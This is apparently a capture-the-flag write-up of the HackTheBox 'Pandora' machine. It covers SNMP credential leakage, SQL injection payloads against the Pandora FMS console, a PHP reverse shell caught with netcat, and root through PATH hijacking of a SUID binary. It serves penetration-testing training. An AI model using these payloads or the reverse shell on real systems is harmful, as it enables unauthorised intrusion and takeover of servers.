Pandora - [HTB]

Cover Image for Pandora - [HTB]
Marmeus
Marmeus

Introduction

Pandora is an easy Linux machine from HackTheBox where you will enumerate the snmp service in order to find a command with credentials pass as parameters. These credentials can be used to gain access to the machine as daniel. Then, there is a Pandora service only available through localhost requiring port forwarding in order to exploit several vulnerabilities for the pandora's version. Finally, you will have to exploit a path hijacking weakness on a SUID to become root.

Enumeration

As always, let's start scanning all opened ports in the box with Nmap.

kali@kali:~/Documents/HTB/Pandora$ nmap -vv -sS -p- -n -T5 -oN AllPorts.txt 10.129.253.52
Nmap scan report for 10.10.11.136
Host is up, received echo-reply ttl 63 (0.18s latency).
Scanned at 2022-01-10 11:41:31 EST for 229s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63


kali@kali:~/Documents/HTB/Pandora$ sudo nmap -sU -sC -sV 10.10.11.136
Nmap scan report for 10.10.11.136
Host is up (0.17s latency).
Not shown: 916 closed ports, 83 open|filtered ports
PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 48fa95537765c36000000000
|   snmpEngineBoots: 31
|_  snmpEngineTime: 4h00m19s
| snmp-interfaces:
|   lo
|     IP address: 127.0.0.1  Netmask: 255.0.0.0
|     Type: softwareLoopback  Speed: 10 Mbps
|     Traffic stats: 1.26 Mb sent, 1.26 Mb received
|   VMware VMXNET3 Ethernet Controller
|     IP address: 10.10.11.136  Netmask: 255.255.0.0
|     MAC address: 00:50:56:b9:c2:f0 (VMware)
|     Type: ethernetCsmacd  Speed: 4 Gbps
|_    Traffic stats: 5.74 Mb sent, 6.19 Mb received
| snmp-netstat:
|   TCP  0.0.0.0:22           0.0.0.0:0
|   TCP  10.10.11.1362:36582  1.1.1.1:53
|   TCP  127.0.0.1:3306       0.0.0.0:0
|   TCP  127.0.0.53:53        0.0.0.0:0
|   UDP  0.0.0.0:68           *:*
|   UDP  0.0.0.0:161          *:*
|_  UDP  127.0.0.53:53        *:*
| snmp-processes:
[...]
| snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
|_  System uptime: 4h00m19.29s (1441929 timeticks)
|_snmp-win32-software:
Service Info: Host: pandora

Then, we continue with a deeper scan of every opened port, getting more information about each service.

kali@kali:~/Documents/HTB/Pandora$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 22,80 10.10.11.136
Nmap scan report for 10.10.11.136
Host is up (0.045s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Looking for domains on the web page for being added to /etc/hosts, we obtain the following.

kali@kali:~/Documents/HTB/Pandora$ curl http://10.10.11.136/ 2>/dev/null | grep \.htb
                    <p>support@panda.htb</p>
                    <p>contact@panda.htb</p>

Accessing the web page, we can read about a monitoring solution.

Panda web page

Because the UDP port 161 is open, let's use snmpwalk to enumerate the service, finding a command with some credentials as parameters.

kali@kali:~/Documents/HTB/Pandora$ snmpwalk -v 2c panda.htb -c public | tee snmpwalk.txt
[...]
HOST-RESOURCES-MIB::hrSWRunParameters.972 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
[...]

These credentials can be used for access as the user Daniel through SSH.

Privilege Escalation 1

We can find a virtual host only available via localhost by enumerating the machine.

daniel@pandora:~$ cat /etc/apache2/sites-available/pandora.conf 
<VirtualHost localhost:80>
  ServerAdmin admin@panda.htb
  ServerName pandora.panda.htb
  DocumentRoot /var/www/pandora
  AssignUserID matt matt
  <Directory /var/www/pandora>
    AllowOverride All
  </Directory>
  ErrorLog /var/log/apache2/error.log
  CustomLog /var/log/apache2/access.log combined
</VirtualHost>

To do so, we need to execute the following command.

kali@kali:~/Documents/HTB/Pandora$ ssh -L localhost:80:localhost:80 daniel@panda.htb -fN

Now we have access to pandora's console.

Pandora console

As we can see above, the pandora's version number is on the landing page. So looking for vulnerabilities, you can find the following post, which explains the SQLi login bypass. However, it doesn't show the payload in the Proof Of Concept.

There are two ways of exploiting this part:

  1. Thanks to the SQLi, we can obtain mat's PHPSESSIONID, leading us to log in as matt. Then, we will need to use another exploit to get RCE.
  2. Thanks to the SQLi and the PHP deserialisation, we can log in as admin, uploading a PHP reverse shell.

Exploitation 1

The payload to log in as matt is the following.

http://localhost/pandora_console/include/chart_generator.php?session_id=' OR `id_session`=(SELECT id_session from tsessions_php where data like '%matt%' LIMIT 1) LIMIT 1 -- -

Then, this post explains how to obtain Remote Command Execution Via the Events Feature

Exploitation 2

The payload to log in as admin is the following:

http://localhost/pandora_console/include/chart_generator.php?session_id=-1' UNION SELECT '<YOUR_PHPSESSIONID>', NULL, 'id_usuario|s:5:"admin";

Now, if we access to Admin tools/File Manager we can upload any file like /usr/share/laudanum/php/php-reverse-shell.php that will be stored under the /images/ directory.

kali@kali:~/Documents/HTB/Pandora$ curl -s & http://localhost/pandora_console/images/shell.php
kali@kali:~/Documents/HTB/Pandora$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.15.118] from (UNKNOWN) [10.129.253.52] 34170
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 21:23:15 up  7:56,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
daniel   pts/0    10.10.15.118     17:29   35.00s  0.72s  0.72s -bash
uid=1000(matt) gid=1000(matt) groups=1000(matt)

Privilege Escalation

Thanks to linpeas, we can see a SUID binary that can only be executed as the user matt.

╔══════════╣ SUID - Check easy privesc, exploits and write perms
[...]
-rwsr-x--- 1 root   matt        17K Dec  3 15:58 /usr/bin/pandora_backup (Unknown SUID binary)

With ltrace, we can see that it doesn't use an absolute path for executing the tar command. Hence, we can do path hijacking to become root.

matt@pandora:/$ ltrace /usr/bin/pandora_backup
getuid()= 1000
geteuid()= 1000
setreuid(1000, 1000)= 0
puts("PandoraFMS Backup Utility"PandoraFMS Backup Utility)= 26
puts("Now attempting to backup Pandora"...Notow attempting to backup PandoraFMS client)= 43
system("tar -cvf /root/.backup/pandora-b"...tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                                           = 512
puts("Backup failed!\nCheck your permis"...Backup failed!
Check your permissions!
)                                                     = 39
+++ exited (status 1) +++

However, we need to access the machine as matt through SSH in order to make it work.

matt@pandora:/home/matt$ mkdir /home/matt/.ssh/
matt@pandora:/home/matt$ chmod 0700 .ssh
matt@pandora:/home/matt$ echo "<Your_id_rsa.pub>" > /home/matt/.ssh/authorized_keys
matt@pandora:/home/matt$ chmod 0600 /home/matt/.ssh/authorized_keys
kali@kali:~/Documents/HTB/Pandora$ ssh matt@panda.htb

Finally, once logged in, we can become root executing the following commands.

matt@pandora:~$ cd /tmp/
matt@pandora:/tmp$ echo "/bin/bash -p" > tar
matt@pandora:/tmp$ chmod +x tar
matt@pandora:/tmp$ export $PATH=$(pwd):$PATH
matt@pandora:/tmp$ /usr/bin/pandora_backup 
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:/tmp# id
uid=0(root) gid=1000(matt) groups=1000(matt)
root@pandora:/tmp# cat /root/root.txt
[CENSORED]